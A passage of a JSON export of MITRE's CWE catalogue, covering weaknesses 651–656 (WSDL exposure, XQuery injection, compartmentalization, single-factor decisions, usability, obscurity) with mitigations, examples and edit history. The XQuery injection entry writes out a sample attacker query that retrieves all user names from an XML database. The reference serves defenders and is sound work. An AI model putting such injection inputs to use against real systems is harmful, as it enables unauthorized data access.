Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"651":{"attr":{"@_ID":"651","@_Name":"Exposure of WSDL File Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Web services architecture may require exposing a Web Service Definition Language (WSDL) file that contains information on the publicly accessible services and how callers of these services should interact with them (e.g. what parameters they expect and what types they return).","Extended_Description":{"xhtml:p":"An information exposure may occur if any of the following apply:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["The WSDL file is accessible to a wider audience than intended.","The WSDL file contains information on the methods/services that should not be publicly accessible or information about deprecated methods. This problem is made more likely due to the WSDL often being automatically generated from the code.","Information in the WSDL file helps guess names/locations of methods/resources that should not be publicly accessible."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The attacker may find sensitive information located in the WSDL file."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Limit access to the WSDL file as much as possible. If services are provided only to a limited number of entities, it may be better to provide WSDL privately to each of these entities than to publish WSDL publicly."},{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Make sure that WSDL does not describe methods that should not be publicly accessible. Make sure to protect service methods that should not be publicly accessible with access controls."},{"Phase":"Architecture and Design","Description":"Do not use method names in WSDL that might help an adversary guess names of private methods/resources used by the service."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The WSDL for a service providing information on the best price of a certain item exposes the following method: float getBestPrice(String ItemID) An attacker might guess that there is a method setBestPrice (String ItemID, float Price) that is available and invoke that method to try and change the best price of a given item to their advantage. The attack may succeed if the attacker correctly guesses the name of the method, the method does not have proper access controls around it and the service itself has the functionality to update the best price of the item."}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak through WSDL File","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through WSDL File","attr":{"@_Date":"2020-02-24"}}]}},"652":{"attr":{"@_ID":"652","@_Name":"Improper Neutralization of Data within XQuery Expressions (\'XQuery Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to dynamically construct an XQuery expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.","Extended_Description":"The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"91","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker might be able to read sensitive information from the XML database."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use parameterized queries. This will help ensure separation between data plane and control plane."},{"Phase":"Implementation","Description":"Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XQL queries is safe in that context."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An attacker may pass XQuery expressions embedded in an otherwise standard XML document. The attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back. doc(accounts.xml)//user[name=\'*\'] The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":46,"Entry_Name":"XQuery Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unsafe Treatment of XQuery Input","attr":{"@_Date":"2008-10-14"}},{"#text":"Failure to Sanitize Data within XQuery Expressions (aka \'XQuery Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data within XQuery Expressions (\'XQuery Injection\')","attr":{"@_Date":"2010-04-05"}}]}},"653":{"attr":{"@_ID":"653","@_Name":"Improper Isolation or Compartmentalization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions.","Extended_Description":"When a weakness occurs in functionality that is accessible by lower-privileged users, then without strong boundaries, an attack might extend the scope of the damage to higher-privileged users.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Separation of Privilege","Description":"Some people and publications use the term \\"Separation of Privilege\\" to describe this weakness, but this term has dual meanings in current usage. This node conflicts with the original definition of \\"Separation of Privilege\\" by Saltzer and Schroeder; that original definition is more closely associated with CWE-654. Because there are multiple interpretations, use of the \\"Separation of Privilege\\" term is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"The exploitation of a weakness in low-privileged areas of the software can be leveraged to reach higher-privileged areas without having to overcome any additional obstacles."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Break up privileges between different modules, objects, or entities. Minimize the interfaces between modules and require strong access control between them."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Single sign-on technology is intended to make it easier for users to access multiple resources or domains without having to authenticate each time. While this is highly convenient for the user and attempts to address problems with psychological acceptability, it also means that a compromise of a user\'s credentials can provide immediate access to all other resources or domains."},{"Intro_Text":"The traditional UNIX privilege model provides root with arbitrary access to all resources, but root is frequently the only user that has privileges. As a result, administrative tasks require root privileges, even if those tasks are limited to a small area, such as updating user manpages. Some UNIX flavors have a \\"bin\\" user that is the owner of system executables, but since root relies on executables owned by bin, a compromise of the bin account can be leveraged for root privileges by modifying a bin-owned executable, such as CVE-2007-4238."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-535"}},{"attr":{"@_External_Reference_ID":"REF-1138"}}]},"Notes":{"Note":[{"#text":"There is a close association with CWE-250 (Execution with Unnecessary Privileges). CWE-653 is about providing separate components for each \\"privilege\\"; CWE-250 is about ensuring that each component has the least amount of privileges possible. In this fashion, compartmentalization becomes one mechanism for reducing privileges.","attr":{"@_Type":"Relationship"}},{"#text":"The term \\"Separation of Privilege\\" is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (this node) and using only one factor in a security decision (CWE-654). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Insufficient Compartmentalization","attr":{"@_Date":"2009-01-12"}}}},"654":{"attr":{"@_ID":"654","@_Name":"Reliance on a Single Factor in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A protection mechanism relies exclusively, or to a large extent, on the evaluation of a single condition or the integrity of a single object or entity in order to make a decision about granting access to restricted resources or functionality.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Separation of Privilege","Description":"Some people and publications use the term \\"Separation of Privilege\\" to describe this weakness, but this term has dual meanings in current usage. While this entry is closely associated with the original definition of \\"Separation of Privilege\\" by Saltzer and Schroeder, others use the same term to describe poor compartmentalization (CWE-653). Because there are multiple interpretations, use of the \\"Separation of Privilege\\" term is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If the single factor is compromised (e.g. by theft or spoofing), then the integrity of the entire security mechanism can be violated with respect to the user that is identified by that factor."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"It can become difficult or impossible for the product to be able to distinguish between legitimate activities by the entity who provided the factor, versus illegitimate activities by an attacker."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use multiple simultaneous checks before granting access to critical operations or granting critical privileges. A weaker but helpful mitigation is to use several successive checks (multiple layers of security)."},{"Phase":"Architecture and Design","Description":"Use redundant access rules on different choke points (e.g., firewalls)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Password-only authentication is perhaps the most well-known example of use of a single factor. Anybody who knows a user\'s password can impersonate that user."},{"Intro_Text":"When authenticating, use multiple factors, such as \\"something you know\\" (such as a password) and \\"something you have\\" (such as a hardware-based one-time password generator, or a biometric device)."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"274"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-535"}}]},"Notes":{"Note":{"#text":"This entry is closely associated with the term \\"Separation of Privilege.\\" This term is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (CWE-653) and using only one factor in a security decision (this entry). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Reliance on a Single Factor in a Security Decision","attr":{"@_Date":"2009-01-12"}}}},"655":{"attr":{"@_ID":"655","@_Name":"Insufficient Psychological Acceptability","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software has a protection mechanism that is too difficult or inconvenient to use, encouraging non-malicious users to disable or bypass the mechanism, whether by accident or on purpose.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"By bypassing the security mechanism, a user might leave the system in a less secure state than intended by the administrator, making it more susceptible to compromise."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Where possible, perform human factors and usability studies to identify where your product\'s security mechanisms are difficult to use, and why."},{"Phase":"Architecture and Design","Description":"Make the security mechanism as seamless as possible, while also providing the user with sufficient details when a security decision produces unexpected results."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In \\"Usability of Security: A Case Study\\" [REF-540], the authors consider human factors in a cryptography product. Some of the weakness relevant discoveries of this case study were: users accidentally leaked sensitive information, could not figure out how to perform some tasks, thought they were enabling a security option when they were not, and made improper trust decisions."},{"Intro_Text":"Enforcing complex and difficult-to-remember passwords that need to be frequently changed for access to trivial resources, e.g., to use a black-and-white printer. Complex password requirements can also cause users to store the passwords in an unsafe manner so they don\'t have to remember them, such as using a sticky note or saving them in an unencrypted file."},{"Intro_Text":"Some CAPTCHA utilities produce images that are too difficult for a human to read, causing user frustration."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-539"}},{"attr":{"@_External_Reference_ID":"REF-540"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 14: Poor Usability." Page 217"}}]},"Notes":{"Note":{"#text":"This weakness covers many security measures causing user inconvenience, requiring effort or causing frustration, that are disproportionate to the risks or value of the protected assets, or that are perceived to be ineffective.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Failure to Satisfy Psychological Acceptability","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Satisfy Psychological Acceptability","attr":{"@_Date":"2009-05-27"}}]}},"656":{"attr":{"@_ID":"656","@_Name":"Reliance on Security Through Obscurity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism.","Extended_Description":"This reliance on \\"security through obscurity\\" can produce resultant weaknesses if an attacker is able to reverse engineer the inner workings of the mechanism. Note that obscurity can be one small part of defense in depth, since it can create more work for an attacker; however, it is a significant risk if used as the primary means of protection.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"259","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"321","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"472","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Never Assuming your secrets are safe"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"The security mechanism can be bypassed easily."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Always consider whether knowledge of your code or design is sufficient to break it. Reverse engineering is a highly successful discipline, and financially feasible for motivated adversaries. Black-box techniques are established for binary analysis of executables that use obfuscation, runtime analysis of proprietary protocols, inferring file formats, and others."},{"Phase":"Architecture and Design","Description":"When available, use publicly-vetted algorithms and procedures, as these are more likely to undergo more extensive security analysis and testing. This is especially the case with encryption and authentication."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The design of TCP relies on the secrecy of Initial Sequence Numbers (ISNs), as originally covered in CVE-1999-0077. If ISNs can be guessed (due to predictability, CWE-330) or sniffed (due to lack of encryption, CWE-311), then an attacker can hijack or spoof connections. Many TCP implementations have had variations of this problem over the years, including CVE-2004-0641, CVE-2002-1463, CVE-2001-0751, CVE-2001-0328, CVE-2001-0288, CVE-2001-0163, CVE-2001-0162, CVE-2000-0916, and CVE-2000-0328.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-542"}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6588","Description":"Reliance on hidden form fields in a web application. Many web application vulnerabilities exist because the developer did not consider that \\"hidden\\" form fields can be processed using a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6588"},{"Reference":"CVE-2006-7142","Description":"Hard-coded cryptographic key stored in executable program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7142"},{"Reference":"CVE-2005-4002","Description":"Hard-coded cryptographic key stored in executable program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4002"},{"Reference":"CVE-2006-4068","Description":"Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline 